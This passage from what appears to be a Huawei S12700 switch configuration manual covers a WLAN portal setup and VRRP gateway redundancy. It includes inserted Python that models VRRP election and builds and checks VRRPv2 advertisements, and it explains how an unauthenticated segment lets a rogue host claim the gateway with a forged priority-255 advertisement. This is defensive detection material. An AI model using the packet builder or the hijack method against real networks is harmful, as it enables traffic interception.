Status field displays ON, the VAP has been successfully created on the AP radios. The Auth
type column shows OPEN, matching the security profile configured in Step 6.
[AC-wlan-view] display vap ssid wlan-net
WID : WLAN ID
--------------------------------------------------------------------------------
AP ID AP name RfID WID BSSID          Status Auth type STA SSID
--------------------------------------------------------------------------------
0     area_1  1    1   60DE-4476-E360 ON     OPEN      0   wlan-net
--------------------------------------------------------------------------------
Total: 2

Manually search for the WLAN with the SSID wlan-net. After completing the social media
authentication process as prompted, run the display station ssid wlan-net command on the
AC. The command output shows that the user has successfully connected to the WLAN
wlan-net.
[AC-wlan-view] display station ssid wlan-net
Rf/WLAN: Radio ID/WLAN ID
Rx/Tx: link receive rate/link transmit rate(Mbps)
---------------------------------------------------------------------------------
STA MAC        AP ID Ap name Rf/WLAN Band Type Rx/Tx RSSI VLAN IP address
---------------------------------------------------------------------------------
e019-1dc7-1e08 0     area_1  1/1     5G   11n  46/59 -68  101  192.168.20.254
---------------------------------------------------------------------------------
Total: 1 2.4G: 0 5G: 1

----End


Configuration Files
- SwitchA configuration file
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
 port link-type trunk
 port trunk pvid vlan 100
 port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
 port link-type trunk
 port trunk allow-pass vlan 100
#
return

- AC configuration file
#
sysname AC
#
vlan batch 100 to 102
#
authentication-profile name p1
 portal-access-profile web1
 free-rule-template default_free_rule
#
domain portal
#
dhcp enable
#
radius-server template policy
 radius-server shared-key cipher %^%#v@)#XkYybF19}~4&3(rDX%va0:#G>0MDrOF^B;D+%^%#
 radius-server authentication 192.168.30.2 1812 source ip-address 192.168.30.1 weight 80
 radius-server accounting 192.168.30.2 1813 source ip-address 192.168.30.1 weight 80
#
acl number 3001
 rule 1 permit ip
#
acl number 6000
 rule 1 permit ip destination fqdn www.googleapis.com
 rule 2 permit ip destination fqdn apis.google.com
 rule 3 permit ip destination fqdn connect.facebook.net
 rule 4 permit ip destination fqdn api.twitter.com
 rule 5 permit ip destination fqdn abs.twimg.com
 rule 6 permit ip destination fqdn mobile.twitter.com
 rule 7 permit ip destination fqdn twitter.com
#
free-rule-template name default_free_rule
 free-rule acl 6000
#
web-auth-server portal_huawei
 server-ip 192.168.30.2
 port 50200
 shared-key cipher %^%#vB3l&dt|S!59SdGIdcT"mwAQ!4[#Y-#{IBGbI[l:%^%#
 url http://access.example.com:8080/portal
 source-ip 192.168.30.1
#
portal-access-profile name web1
 web-auth-server portal_huawei direct
#
aaa
 authentication-scheme auth
  authentication-mode radius
 accounting-scheme acco
  accounting-mode radius
  accounting realtime 15
 domain portal
  authentication-scheme auth
  accounting-scheme acco
  radius-server policy
#
interface Vlanif100
 ip address 192.168.10.1 255.255.255.0
 dhcp select interface
#
interface Vlanif101
 ip address 192.168.20.1 255.255.255.0
 authentication-profile p1
 dhcp select interface
#
interface Vlanif102
 ip address 192.168.30.1 255.255.255.0
#
interface GigabitEthernet1/0/1
 port link-type trunk
 port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
 port link-type trunk
 port trunk allow-pass vlan 101
#
interface GigabitEthernet1/0/3
 port link-type trunk
 port trunk allow-pass vlan 102
#
portal timer quiet-period 240
portal quiet-times 5
#
capwap source interface vlanif100
#
wlan
 security-profile name wlan-security
 ssid-profile name wlan-ssid
  ssid wlan-net
 vap-profile name wlan-vap
  forward-mode tunnel
  service-vlan vlan-id 101
  ssid-profile wlan-ssid
  security-profile wlan-security
  authentication-profile p1
 regulatory-domain-profile name domain1
 ap-group name ap-group1
  regulatory-domain-profile domain1
  radio 0
   vap-profile wlan-vap wlan 1
  radio 1
   vap-profile wlan-vap wlan 1
 ap-id 0 type-id 19 ap-mac 60de-4476-e360 ap-sn 210235554710CB000042
  ap-name area_1
  ap-group ap-group1
#
return

11 Typical Reliability Configuration

About This Chapter

11.1 Typical VRRP Configuration


11.2 Typical BFD Configuration


11.1 Typical VRRP Configuration

11.1.1 Example for Configuring a VRRP Group in Active/Standby Mode

VRRP Active/Standby Overview
Generally, all hosts on the same network segment have the same default route with the
gateway address as the next hop address. The hosts use the default route to send packets to the
gateway and the gateway forwards the packets to other network segments. When the gateway
fails, the hosts with the same default route cannot communicate with external networks.
Configuring multiple egress gateways is a common method to improve system reliability.
However, route selection among the gateways becomes an issue.
VRRP solves the problem. VRRP virtualizes multiple routing devices into a virtual router
without changing the networking, and uses the virtual router IP address as the default gateway
address to implement gateway backup. When the gateway becomes faulty, VRRP selects a
new gateway to transmit service traffic to ensure reliable communication.
It is recommended that you set the preemption delay of the backup in a VRRP group to 0,
configure the master in preemption mode, and set the master's preemption delay to longer
than 15s. These settings give the uplink and downlink time to synchronize their status on
an unstable network. Without them, two masters may coexist and user devices may learn the
wrong master address, interrupting traffic.
- Preemption mode: A backup preempts to become the master when its priority is higher than
the master's.
- Non-preemption mode: As long as the master is working properly, a backup with a higher
priority cannot become the master.

Configuration Notes
- Ensure that each device of the same VRRP group is configured with the same VRID.
- The following describes the applicable product models and versions.

Table 11-1 Applicable product models and versions

Product | Product Model | Software Version
S12700 | S12708 and S12712 | V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
S12700 | S12704 | V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.


Networking Requirements
As shown in Figure 11-1, HostA is dual-homed to SwitchA and SwitchB through the switch.
To ensure nonstop service transmission, a VRRP group in active/standby mode needs to be
configured on SwitchA and SwitchB.
- The host uses SwitchA as the default gateway to connect to the Internet. When SwitchA
becomes faulty, SwitchB functions as the gateway. This implements gateway backup.
- After SwitchA recovers, it preempts to become the master and transmits data after a
preemption delay of 20s.

NOTE

In this scenario, ensure that all connected interfaces have STP disabled. If STP is enabled and VLANIF
interfaces of switches are used to construct a Layer 3 ring network, an interface on the network may be
blocked. As a result, Layer 3 services on the network cannot run normally.

Figure 11-1 Networking for configuring a VRRP group in active/standby mode

[Figure: VRRP VRID 1 with virtual IP address 10.1.1.111. HostA (10.1.1.100/24) connects to
the Layer 2 Switch, whose GE1/0/1 and GE1/0/2 uplink to SwitchA GE1/0/2 (10.1.1.1/24,
Master) and SwitchB GE1/0/2 (10.1.1.2/24, Backup). SwitchA GE1/0/1 (192.168.1.1/24)
connects to SwitchC GE1/0/1 (192.168.1.2/24); SwitchB GE1/0/1 (192.168.2.1/24) connects to
SwitchC GE1/0/2 (192.168.2.2/24); SwitchC GE1/0/3 (172.16.1.1/24) connects to the Internet.]

Configuration Roadmap
A VRRP group in active/standby mode is used to implement gateway backup. The
configuration roadmap is as follows:
1. Assign an IP address to each interface and configure a routing protocol to ensure
network connectivity.
2. Configure a VRRP group on SwitchA and SwitchB. Set a higher priority for SwitchA so
that SwitchA functions as the master to forward traffic, and set the preemption delay to
20s on SwitchA. Set a lower priority for SwitchB so that SwitchB functions as the
backup.

Procedure
Step 1 Configure devices to ensure network connectivity.
# Assign an IP address to each interface. SwitchA is used as an example. The configurations
of SwitchB and SwitchC are similar to the configuration of SwitchA, and are not mentioned
here. For details, see the configuration files.


<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100 300
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type hybrid
[SwitchA-GigabitEthernet1/0/1] port hybrid pvid vlan 300
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 300
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type hybrid
[SwitchA-GigabitEthernet1/0/2] port hybrid pvid vlan 100
[SwitchA-GigabitEthernet1/0/2] port hybrid untagged vlan 100
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] ip address 10.1.1.1 24
[SwitchA-Vlanif100] quit
[SwitchA] interface vlanif 300
[SwitchA-Vlanif300] ip address 192.168.1.1 24
[SwitchA-Vlanif300] quit

# Configure Layer 2 forwarding on the switch.


<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan 100
[Switch-vlan100] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type hybrid
[Switch-GigabitEthernet1/0/1] port hybrid pvid vlan 100
[Switch-GigabitEthernet1/0/1] port hybrid untagged vlan 100
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type hybrid
[Switch-GigabitEthernet1/0/2] port hybrid pvid vlan 100
[Switch-GigabitEthernet1/0/2] port hybrid untagged vlan 100
[Switch-GigabitEthernet1/0/2] quit

# Configure OSPF on SwitchA, SwitchB, and SwitchC. SwitchA is used as an example. The
configurations of SwitchB and SwitchC are similar to the configuration of SwitchA, and are
not mentioned here. For details, see the configuration files.
[SwitchA] ospf 1
[SwitchA-ospf-1] area 0
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] quit

Step 2 Configure a VRRP group.


# Configure VRRP group 1 on SwitchA, and set the priority of SwitchA to 120 and the
preemption delay to 20s.
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.111
[SwitchA-Vlanif100] vrrp vrid 1 priority 120 //The default priority of a device in a
VRRP group is 100. Set the master's priority higher than the backup's.
[SwitchA-Vlanif100] vrrp vrid 1 preempt-mode timer delay 20 //A device in a VRRP group
preempts immediately by default. Set a preemption delay on the master to prevent service
interruptions on an unstable network where devices in the VRRP group repeatedly preempt to
be the master.
[SwitchA-Vlanif100] quit

# Configure VRRP group 1 on SwitchB. SwitchB keeps the default priority 100 and the default preemption delay of 0.


[SwitchB] interface vlanif 100
[SwitchB-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.111
[SwitchB-Vlanif100] quit
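The priority and preemption settings in Step 2 decide who owns the virtual address and when ownership moves back. The following Python model is an added example, not Huawei code: it implements the VRRP election rules (highest priority wins, the higher primary IP breaks a tie when no master exists, and a higher-priority backup preempts a live master only if preemption is enabled and its preemption delay has elapsed since it came up) and replays the link failure and recovery that Step 3 verifies, with SwitchA at priority 120 and a 20-second delay against SwitchB at the defaults. Names and addresses are the example's; the timestamps are chosen for the demonstration, and master-down detection (about three advertisement intervals in real VRRP) is collapsed to zero here.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

VRRP_DEFAULT_PRIORITY = 100


@dataclass
class VrrpRouter:
    name: str
    ip: str                                   # primary IP on the VRRP interface
    priority: int = VRRP_DEFAULT_PRIORITY
    preempt: bool = True                      # Huawei default: preemption enabled
    preempt_delay: int = 0                    # seconds; 0 means immediate
    up: bool = True
    up_since: float = 0.0                     # when the VRRP interface last came up


def virtual_mac(vrid: int) -> str:
    """VRRP virtual MAC 00-00-5E-00-01-{VRID}, in Huawei's xxxx-xxxx-xxxx notation."""
    if not 1 <= vrid <= 255:
        raise ValueError("VRID must be 1..255")
    return "0000-5e00-01%02x" % vrid


def _ip_key(ip: str) -> Tuple[int, ...]:
    return tuple(int(octet) for octet in ip.split("."))


class VrrpGroup:
    """Election model: highest priority wins, higher primary IP breaks ties when no
    master exists; a higher-priority backup takes over a live master only if
    preemption is enabled and its preemption delay has elapsed since it came up."""

    def __init__(self, vrid: int, virtual_ip: str, routers: List[VrrpRouter]):
        self.vrid, self.virtual_ip = vrid, virtual_ip
        self.routers = {r.name: r for r in routers}
        self.master: Optional[str] = None
        self.history: List[Tuple[float, Optional[str]]] = []   # (time, new master)
        self._now = 0.0

    def _advance(self, now: float) -> None:
        if now < self._now:
            raise ValueError("time must not go backwards")
        self._now = now

    def set_link(self, name: str, up: bool, now: float) -> None:
        """Models shutdown / undo shutdown on the router's VRRP-facing interface."""
        self._advance(now)
        router = self.routers[name]
        if up and not router.up:
            router.up_since = now
        router.up = up
        self.evaluate(now)

    def evaluate(self, now: float) -> Optional[str]:
        self._advance(now)
        live = [r for r in self.routers.values() if r.up]
        current = self.routers.get(self.master) if self.master else None
        if not live:
            chosen = None
        else:
            best = max(live, key=lambda r: (r.priority, _ip_key(r.ip)))
            if current is None or not current.up:
                chosen = best                 # master gone: best live router takes over
            elif (best is not current and best.priority > current.priority
                  and best.preempt and now - best.up_since >= best.preempt_delay):
                chosen = best                 # preemption, only after the delay
            else:
                chosen = current
        new_master = chosen.name if chosen else None
        if new_master != self.master:
            self.master = new_master
            self.history.append((now, new_master))
        return self.master


def simulate_example() -> list:
    """Replays Step 3: SwitchA (priority 120, preemption delay 20 s) loses GE1/0/2
    at t=100 and gets it back at t=200; SwitchB runs with the defaults."""
    switch_a = VrrpRouter("SwitchA", "10.1.1.1", priority=120, preempt_delay=20)
    switch_b = VrrpRouter("SwitchB", "10.1.1.2")
    group = VrrpGroup(1, "10.1.1.111", [switch_a, switch_b])
    group.evaluate(0)
    group.set_link("SwitchA", False, 100)
    group.set_link("SwitchA", True, 200)
    for t in (205, 215, 220):                 # SwitchB stays master until the delay expires
        group.evaluate(t)
    return group.history


if __name__ == "__main__":
    print(virtual_mac(1), simulate_example())
```

The history the model returns is the sequence the display vrrp outputs in Step 3 show: SwitchA master at the start, SwitchB master while SwitchA's interface is down, and SwitchA master again 20 seconds after the interface returns. The same election rule is why the Auth type NONE line in those outputs matters: any device on VLAN 100 that advertises a higher priority would be chosen by this logic.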


Step 3 Verify the configuration.

# After the configuration is complete, run the display vrrp command on SwitchA and
SwitchB. You can see that SwitchA is in Master state and SwitchB is in Backup state. Note
that Auth type is NONE: the VRRP advertisements on VLAN 100 are unauthenticated, so any
device on that segment that sends advertisements with a higher priority would be elected
master. Keep VLAN 100 restricted to the two gateways and the access switch, or enable VRRP
authentication with the vrrp vrid authentication-mode command.
[SwitchA] display vrrp
Vlanif100 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.111
Master IP : 10.1.1.1
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
[SwitchB] display vrrp
Vlanif100 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.111
Master IP : 10.1.1.1
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

# Run the display ip routing-table command on SwitchA and SwitchB. The command output
shows that a direct route to the virtual IP address exists in the routing table of SwitchA and an
OSPF route to the virtual IP address exists in the routing table of SwitchB. The command
output on SwitchA and SwitchB is as follows:
[SwitchA] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 9 Routes : 10

Destination/Mask Proto Pre Cost Flags NextHop Interface

10.1.1.0/24 Direct 0 0 D 10.1.1.1 Vlanif100


10.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif100
10.1.1.111/32 Direct 0 0 D 127.0.0.1 Vlanif100
127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
172.16.1.0/24 OSPF 10 2 D 192.168.1.2 Vlanif300
192.168.1.0/24 Direct 0 0 D 192.168.1.1 Vlanif300
192.168.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif300
192.168.2.0/24 OSPF 10 2 D 10.1.1.2 Vlanif100
OSPF 10 2 D 192.168.1.2 Vlanif300
[SwitchB] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------

Issue 10 (2016-10-30) Huawei Proprietary and Confidential 802


Copyright © Huawei Technologies Co., Ltd.
S12700 Series Agile Switches
Typical Configuration Examples 11 Typical Reliability Configuration

Routing Tables: Public
Destinations : 9        Routes : 10

Destination/Mask    Proto   Pre  Cost  Flags  NextHop       Interface

10.1.1.0/24         Direct  0    0     D      10.1.1.2      Vlanif100
10.1.1.2/32         Direct  0    0     D      127.0.0.1     Vlanif100
10.1.1.111/32       OSPF    10   2     D      10.1.1.1      Vlanif100
127.0.0.0/8         Direct  0    0     D      127.0.0.1     InLoopBack0
127.0.0.1/32        Direct  0    0     D      127.0.0.1     InLoopBack0
172.16.1.0/24       OSPF    10   2     D      192.168.2.2   Vlanif200
192.168.1.0/24      OSPF    10   2     D      10.1.1.1      Vlanif100
                    OSPF    10   2     D      192.168.2.2   Vlanif200
192.168.2.0/24      Direct  0    0     D      192.168.2.1   Vlanif200
192.168.2.1/32      Direct  0    0     D      127.0.0.1     Vlanif200

# Run the shutdown command on GE1/0/2 of SwitchA to simulate a link fault.
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] shutdown
[SwitchA-GigabitEthernet1/0/2] quit

# Run the display vrrp command on SwitchB to view the VRRP status. The command output
shows that SwitchB is in Master state.
[SwitchB] display vrrp
Vlanif100 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.111
Master IP : 10.1.1.2
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 100
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:18:40

# Run the undo shutdown command on GE1/0/2 of SwitchA.
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] undo shutdown
[SwitchA-GigabitEthernet1/0/2] quit

# After the 20 s preemption delay elapses, run the display vrrp command on SwitchA to view the
VRRP status. The command output shows that SwitchA is in Master state again.
[SwitchA] display vrrp
Vlanif100 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.111
Master IP : 10.1.1.1
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:20:56

----End
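Every display vrrp output in this example reports Auth type : NONE. The advertisements that decide which switch answers for 10.1.1.111 are therefore unauthenticated, and any host on VLAN 100 that can send to 224.0.0.18 (IP protocol 112) can inject an advertisement for VRID 1 with a higher priority and draw the segment's default-gateway traffic to itself. VRRPv2 authentication is only a weak deterrent (a simple-text key travels in the clear), so the practical controls are to keep untrusted ports out of VLAN 100 and to watch the advertisements themselves. The following Python script is an added example, not Huawei code and not part of the original document: it builds and parses VRRPv2 advertisements using the packet layout of RFC 3768, verifies the checksum, and compares each advertisement with an expected inventory (EXPECTED, constructed from the addresses and priorities of this example) to flag unknown sources, unexpected virtual IPs, and priority 255 claims. The sample advertisements, the rogue source 10.1.1.50 and all function names are assumptions made for the example.

```python
import ipaddress
import struct

# Added example, not part of the Huawei document. Expected VRRP inventory for
# VLAN 100 in the example above: VRID 1, virtual IP 10.1.1.111, advertised by
# SwitchA (10.1.1.1, priority 120) or SwitchB (10.1.1.2, priority 100).
# No device owns 10.1.1.111 as an interface address, so priority 255 must never appear.
EXPECTED = {
    1: {"vip": "10.1.1.111", "sources": {"10.1.1.1": 120, "10.1.1.2": 100}},
}

VRRP_MULTICAST = "224.0.0.18"   # destination of every advertisement (IP protocol 112)


def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones-complement checksum; an odd-length buffer is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_advertisement(vrid, priority, vips, adver_int=1, auth_type=0, auth_data=b""):
    """Build a VRRPv2 advertisement (RFC 3768 section 5.3) with a valid checksum.

    Layout: ver/type, VRID, priority, count, auth type, adver int, checksum,
    then count IPv4 addresses, then 8 bytes of authentication data.
    """
    addrs = b"".join(ipaddress.IPv4Address(v).packed for v in vips)
    auth = auth_data.ljust(8, b"\x00")[:8]
    header = struct.pack("!BBBBBBH", (2 << 4) | 1, vrid, priority, len(vips),
                         auth_type, adver_int, 0)
    body = header + addrs + auth
    return body[:6] + struct.pack("!H", inet_checksum(body)) + body[8:]


def parse_advertisement(pkt: bytes) -> dict:
    """Parse and validate a VRRPv2 advertisement; raise ValueError if malformed."""
    if len(pkt) < 16:
        raise ValueError("too short for a VRRPv2 advertisement")
    vt, vrid, prio, count, auth_type, adver_int, _ = struct.unpack("!BBBBBBH", pkt[:8])
    if vt >> 4 != 2 or vt & 0x0F != 1:
        raise ValueError("not a VRRPv2 advertisement")
    if len(pkt) != 8 + 4 * count + 8:
        raise ValueError("length does not match the IP address count")
    if inet_checksum(pkt) != 0:      # a correct checksum sums to zero over the whole packet
        raise ValueError("bad checksum")
    vips = [str(ipaddress.IPv4Address(pkt[8 + 4 * i:12 + 4 * i])) for i in range(count)]
    return {"vrid": vrid, "priority": prio, "count": count, "auth_type": auth_type,
            "adver_int": adver_int, "vips": vips}


def check_advertisement(src_ip, pkt, expected=EXPECTED):
    """Return a list of alert strings for an advertisement that deviates from the inventory.

    An empty list means the advertisement is consistent with the expected master/backup.
    """
    adv = parse_advertisement(pkt)
    spec = expected.get(adv["vrid"])
    if spec is None:
        return [f"VRID {adv['vrid']}: unknown VRID advertised by {src_ip}"]
    alerts = []
    if adv["vips"] != [spec["vip"]]:
        alerts.append(f"VRID {adv['vrid']}: unexpected virtual IP list {adv['vips']} from {src_ip}")
    if adv["priority"] == 255:
        alerts.append(f"VRID {adv['vrid']}: {src_ip} claims to be the IP address owner (priority 255)")
    if src_ip not in spec["sources"]:
        alerts.append(f"VRID {adv['vrid']}: advertisement from unknown source {src_ip} "
                      f"with priority {adv['priority']}")
    elif adv["priority"] > spec["sources"][src_ip]:
        alerts.append(f"VRID {adv['vrid']}: {src_ip} advertises priority {adv['priority']}, "
                      f"expected {spec['sources'][src_ip]}")
    return alerts


if __name__ == "__main__":
    # Constructed sample traffic: the legitimate master, the legitimate backup
    # (it only advertises while it is master), and a rogue host hijacking the gateway.
    samples = [
        ("10.1.1.1", build_advertisement(1, 120, ["10.1.1.111"])),
        ("10.1.1.2", build_advertisement(1, 100, ["10.1.1.111"])),
        ("10.1.1.50", build_advertisement(1, 255, ["10.1.1.111"])),
    ]
    for src, pkt in samples:
        print(src, check_advertisement(src, pkt) or "ok")
```

Feed check_advertisement from a capture of IP protocol 112 on VLAN 100 with the source address of the IP header and the payload that follows it; the two legitimate samples produce no alerts, while the rogue sample is reported twice, once for the unknown source and once for the priority 255 claim. Because an attacker with layer 2 access could also spoof the source address of a real switch, treat the priority comparison as the decisive signal and the source check as corroboration.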

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100 300
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.111
vrrp vrid 1 priority 120
vrrp vrid 1 preempt-mode timer delay 20
#
interface Vlanif300
ip address 192.168.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 300
port hybrid untagged vlan 300
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
return

l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 100 200
#
interface Vlanif100
ip address 10.1.1.2 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.111
#
interface Vlanif200
ip address 192.168.2.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 200
port hybrid untagged vlan 200
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return

l Configuration file of SwitchC
#
sysname SwitchC
#
vlan batch 200 300 400
#
interface Vlanif200
ip address 192.168.2.2 255.255.255.0
#
interface Vlanif300
ip address 192.168.1.2 255.255.255.0
#
interface Vlanif400
ip address 172.16.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 300
port hybrid untagged vlan 300
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 200
port hybrid untagged vlan 200
#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid pvid vlan 400
port hybrid untagged vlan 400
#
ospf 1
area 0.0.0.0
network 172.16.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return

l Configuration file of the switch
#
sysname Switch
#
vlan batch 100
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
return

Relevant Information
Video
Configuring VRRP
11.1.2 Example for Configuring a VRRP Group in Load Balancing Mode

VRRP Load Balancing Overview
In load balancing mode, multiple devices transmit service traffic simultaneously. Therefore,
the load balancing mode requires two or more virtual routers. Each virtual router contains one
master and multiple backups, and the master in each virtual router can be different.

The load balancing mode differs from the active/standby mode in the following ways:
l Multiple VRRP groups need to be created, and the master in each VRRP group can be
different.
l A VRRP device can join multiple VRRP groups and has different priorities in different
VRRP groups.

Configuration Notes
l VRRP groups must use different virtual IP addresses. The virtual IP address of a VRRP
group must be on the same network segment as the IP address of the interface where the
VRRP group is configured.
l Ensure that each device of the same VRRP group is configured with the same VRID.
l The following describes the applicable product models and versions.

Table 11-2 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 11-2, HostA and HostC are dual-homed to SwitchA and SwitchB through
the switch. To reduce the load of data traffic on SwitchA, HostA uses SwitchA as the default
gateway to connect to the Internet, and SwitchB functions as the backup gateway. HostC uses
SwitchB as the default gateway to connect to the Internet, and SwitchA functions as the
backup gateway. This implements load balancing.

NOTE
In this scenario, ensure that all connected interfaces have STP disabled. If STP is enabled and VLANIF
interfaces of switches are used to construct a Layer 3 ring network, an interface on the network may be
blocked. As a result, Layer 3 services on the network cannot run normally.

Figure 11-2 Networking diagram for configuring a VRRP group in load balancing mode

(Diagram not reproduced; the addressing it shows is as follows.)
HostA 10.1.10.100/24 and HostC 10.1.50.100/24 connect to the switch, which connects to SwitchA over GE1/0/1 and to SwitchB over GE1/0/2.
SwitchA: GE1/0/2 10.1.10.1/24 and 10.1.50.1/24 (toward the switch); GE1/0/1 192.168.1.1/24 (toward SwitchC); VRID 1 Master, VRID 2 Backup.
SwitchB: GE1/0/2 10.1.10.2/24 and 10.1.50.2/24 (toward the switch); GE1/0/1 192.168.2.1/24 (toward SwitchC); VRID 1 Backup, VRID 2 Master.
SwitchC: GE1/0/1 192.168.1.2/24, GE1/0/2 192.168.2.2/24, GE1/0/3 172.16.1.1/24 toward the Internet.
VRRP VRID 1 virtual IP address: 10.1.10.111. VRRP VRID 2 virtual IP address: 10.1.50.111.

Configuration Roadmap
A VRRP group in load balancing mode is used to implement load balancing. The
configuration roadmap is as follows:

1. Assign an IP address to each interface and configure a routing protocol to ensure
network connectivity.
2. Create VRRP groups 1 and 2 on SwitchA and SwitchB. In VRRP group 1, configure
SwitchA as the master and SwitchB as the backup. In VRRP group 2, configure SwitchB
as the master and SwitchA as the backup.

Procedure
Step 1 Configure devices to ensure network connectivity.

# Assign an IP address to each interface. SwitchA is used as an example. The configurations
of SwitchB and SwitchC are similar to the configuration of SwitchA, and are not mentioned
here. For details, see the configuration files.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100 300 500
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 300
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 100 500
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] ip address 10.1.10.1 24
[SwitchA-Vlanif100] quit
[SwitchA] interface vlanif 500
[SwitchA-Vlanif500] ip address 10.1.50.1 24
[SwitchA-Vlanif500] quit
[SwitchA] interface vlanif 300
[SwitchA-Vlanif300] ip address 192.168.1.1 24
[SwitchA-Vlanif300] quit

# Configure Layer 2 forwarding on the switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 100 500
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 100 500
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type trunk
[Switch-GigabitEthernet1/0/2] port trunk allow-pass vlan 100 500
